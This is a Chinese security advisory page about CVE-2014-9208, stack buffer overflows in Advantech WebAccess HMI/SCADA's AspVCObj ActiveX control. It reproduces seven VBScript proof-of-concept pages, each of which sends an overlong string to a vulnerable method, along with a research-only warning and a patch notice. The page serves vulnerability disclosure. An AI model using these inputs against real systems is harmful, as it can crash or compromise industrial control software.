安全研究

安全漏洞
Advantech WebAccess 缓冲区溢出漏洞(CVE-2014-9208)

发布日期:2015-09-08
更新日期:2015-09-10

受影响系统:
Advantech WebAccess 8.0
Advantech WebAccess 3.4.3
描述:
CVE(CAN) ID: CVE-2014-9208

WebAccess HMI/SCADA 软件提供远程控制与管理,让用户在设施管理系统、发电站及楼宇自动化系统中,轻松查看与配置自动化设备。

Advantech WebAccess应用中存在多个栈缓冲区溢出漏洞,远程攻击者利用这些漏洞可使应用崩溃,执行任意代码。

<*来源:Praveen Darshanam (praveen.recker@sify.com
  *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Praveen Darshanam (praveen.recker@sify.com)提供了如下测试方法:

Introduction
*********************************************************************************
Using Advantech WebAccess SCADA Software we can remotely manage Industrial
Control systems devices like RTU's, Generators, Motors etc. Attackers can
execute code remotely by passing maliciously crafted string to
ConvToSafeArray API in ASPVCOBJLib.AspDataDriven ActiveX.

Operating System: Windows SP1
Affected Product: Advantech WebAccess 8.0, 3.4.3
Vulnerable Program: AspVCObj.dll
CVE-2014-9208

*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
UpdateProject Overflow Remote Code Execution"
*********************************************************************************

<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:3703BA5D-7329-4E60-A1A5-AE7D6DF267C1' id='target' />
<script language='vbscript'>

<!--
targetFile = "C:\WebAccess\Node\webdobj.dll"
prototype  = "Sub UpdateProject ( ByVal WwwPort As String ,  ByVal ProjName
As String ,  ByVal ProjIP As String ,  ByVal ProjPort As Long ,  ByVal
ProjTimeout As Long ,  ByVal ProjDir As String )"
-->

arg1="defaultV"
arg2="defaultV"
arg3=String(1044, "A")
arg4=1
arg5=1
arg6="defaultV"

target.UpdateProject arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6

</script></html>
</html>


*********************************************************************************

Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
InterfaceFilter Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype  = "Function InterfaceFilter ( ByVal Interface As String ) As
String"
-->

arg1=String(1044, "A")

target.InterfaceFilter arg1

</script></html>


*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
FileProcess Overflow Remote Code Execution"
*********************************************************************************

<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype  = "Sub FileProcess ( ByVal Type As Integer ,  ByVal FileName As
String )"
-->

arg1=1
arg2=String(1044, "A")

target.FileProcess arg1 ,arg2

</script></html>


*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
GetWideStrCpy Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype  = "Function GetWideStrCpy ( ByVal Type As Integer ,  ByVal inStr
As String ) As String"
-->

arg1=1
arg2=String(1044, "A")

target.GetWideStrCpy arg1 ,arg2

</script></html>

*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
GetRecipeInfo Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype  = "Function GetRecipeInfo ( ByVal Type As Integer ,  ByVal
filePath As String )"
-->

arg1=1
arg2=String(1044, "A")

target.GetRecipeInfo arg1 ,arg2

</script></html>

*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
GetLastTagNbr Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype  = "Function GetLastTagNbr ( ByVal TagName As String ) As String"
-->

arg1=String(1044, "A")

target.GetLastTagNbr arg1

</script></html>

*********************************************************************************

Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
ConvToSafeArray Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype  = "Function ConvToSafeArray ( ByVal ArrSize As Integer ,  ByVal
inStr As String )"
-->

arg1=1
arg2=String(2068, "A")

target.ConvToSafeArray arg1 ,arg2

</script></html>
*********************************************************************************
Vulnerabilities were reported to Advantech sometime in January/February
2015, coordinated through CSOC.From April 2015 they has been postponing the
fix.

建议:
厂商补丁:

Advantech
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.advantech.com/industrial-automation/webaccess

浏览次数:1903
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障